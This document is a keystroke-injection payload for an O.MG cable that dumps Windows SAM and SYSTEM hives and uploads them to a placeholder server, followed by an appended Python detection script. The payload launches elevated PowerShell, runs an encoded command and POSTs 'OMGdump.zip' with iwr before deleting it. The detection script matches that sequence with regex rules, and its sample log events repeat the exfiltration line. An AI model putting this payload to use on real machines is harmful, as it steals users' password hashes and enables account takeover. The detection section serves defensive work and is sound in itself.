REM Title: SamDumpCable
REM Description: Dump users' SAM and SYSTEM hives and exfiltrate them. Afterwards you can use a tool like samdump2 to get the users' hashes.
REM Author: 0iphor13
REM Version: 1.0
REM Category: Credentials
REM Requirements: OMG Firmware v.2.5 or higher

DELAY 1000
DUCKY_LANG de
DELAY 500
DELAY 1500
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
DELAY 500
ENTER
DELAY 1000
REM Change this shortcut depending on the system's language (engl.: ALT y)
ALT j
DELAY 250
STRING powershell.exe -NoP -enc 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
DELAY 200
ENTER
DELAY 200
REM Insert your receiving server's IP here ----------------------------------------------------------
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
DELAY 200
ENTER
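
REM Added example, not part of the original payload or the author's code: detection logic for the command sequence typed above (elevated PowerShell launch, an encoded command, then an HTTP POST of a file followed by its deletion).
REM Assumptions: process-creation command lines and PowerShell script-block logs are collected and flattened to (time, host, text); the rule names, the 120-second window and all sample events are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Patterns taken from the keystrokes visible in the payload above.
RULES = {
    "elevated_spawn": re.compile(r"Start-Process\s+powershell\b.*-Verb\s+runAs", re.I),
    "encoded_command": re.compile(r"powershell(?:\.exe)?\b.*\s-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "post_file_upload": re.compile(r"\b(?:iwr|Invoke-WebRequest)\b.*-Method\s+POST\b.*-InFile\s+\S+", re.I),
    "archive_cleanup": re.compile(r"\bRemove-Item\b\s+\S+\.zip\b", re.I),
}
WINDOW = timedelta(seconds=120)  # assumed correlation window

# Constructed sample events: (ISO time, host, text). Hosts, IPs and the
# base64 blob (UTF-16LE "AAA...") are made up for this example.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", "WS-01", "powershell Start-Process powershell -Verb runAs"),
    ("2024-01-01T10:00:03", "WS-01", "powershell.exe -NoP -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ("2024-01-01T10:00:05", "WS-01", 'iwr "http://192.0.2.10" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit'),
    ("2024-01-01T11:00:00", "WS-02", "powershell.exe -NoP -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
    ("2024-01-01T11:30:00", "WS-03", "powershell.exe -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ("2024-01-01T14:00:00", "WS-03", "Invoke-WebRequest https://example.com/report -Method POST -InFile report.csv"),
]

def match_rules(text):
    """Return the sorted names of all rules that match one log line."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def correlate(events, window=WINDOW):
    """Alert per host when an encoded command is followed by a file upload within `window`."""
    hits = {}
    for ts, host, text in events:
        when = datetime.fromisoformat(ts)
        for name in match_rules(text):
            hits.setdefault(host, []).append((when, name))
    alerts = {}
    for host, found in hits.items():
        enc = [t for t, n in found if n == "encoded_command"]
        up = [t for t, n in found if n == "post_file_upload"]
        if any(timedelta(0) <= u - e <= window for e in enc for u in up):
            alerts[host] = sorted({n for _, n in found})
    return alerts

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(host, rules)
```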